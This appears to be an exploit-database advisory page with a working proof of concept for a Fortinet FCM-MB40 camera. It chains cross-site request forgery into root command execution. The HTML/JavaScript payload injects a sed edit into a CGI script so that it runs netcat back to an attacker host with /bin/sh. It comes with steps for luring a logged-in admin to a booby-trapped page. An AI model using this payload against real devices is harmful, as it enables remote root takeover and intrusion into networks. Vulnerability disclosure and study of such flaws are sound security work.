Fortinet FCM-MB40 Cross Site Request Forgery / Remote Command Execution

2019.06.26
Credit: XORcat
Risk: High
Local: No
Remote: Yes
CVE: N/A

# Exploit Title: FCM-MB40 Remote Command Execution as Root via CSRF # Date: 2019-06-19 # Exploit Author: @XORcat # Vendor Homepage: https://fortinet.com/ # Software Link: Customer Account Required # Version: v1.2.0.0 # Tested on: Linux # CVE : TBA <html> <!-- FCM-MB40 CSRF to RCE as root, by Aaron Blair (@xorcat) Full details: https://xor.cat/2019/06/19/fortinet-forticam-vulns/ Follow the following steps to demonstrate this PoC: 1. Replace IP addresses in Javascript code to repr esent your testing environment. 2. Launch a `netcat` listener on the attacker's host using `nc -nvlp 1337` 3. Ensure the "admin" user's browser is logged in to the FCM-MB40. * Note: all modern browsers will cache Basic Authentication credentials (such as those used by the FCM-MB40) even if the FCM-MB40's administration page is closed. 4. Open the crafted HTML document using the "admin" user's browser. * Note: In an attack scenario, this step would be performed by implanting the code into a legitimate webpage that the "admin" user visits, or by tricking the "admin" user into opening a page which includes the code. 5. Note that the `netcat` listener established in step 2. has received a connection from the camera, and that it is presenting a `/bin/sh` session as root. * Note: type `id` in the `netcat` connection to verify this. _Note: After this issue has been exploited, the state of the system will have changed, and future exploitation attempts may require modification._ --> <head> <script> const sleep = (milliseconds) => { return new Promise(resolve => setTimeout(resolve, milliseconds)) }; var sed_url = 'http://192.168.1.20/cgi-bin/camctrl_save_profile.cgi?num=9&name=a%20-e%20s/^if.*/nc\\t192.168.1.10\\t1337\\t-e\\t\\/bin\\/sh\\nexit/%20../cgi-bin/ddns.cgi%20&save=profile'; var execute_url = 'http://192.168.1.20/cgi-bin/ddns.cgi'; var sed_img = document.createElement("img"); sed_img.src = sed_url; sleep(400).then(() => { var execute_img = document.createElement("img"); execute_img.src = execute_url; }); </script> </head> <body> <h1>Welcome to my non-malicious website.</h1> </body> </html>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top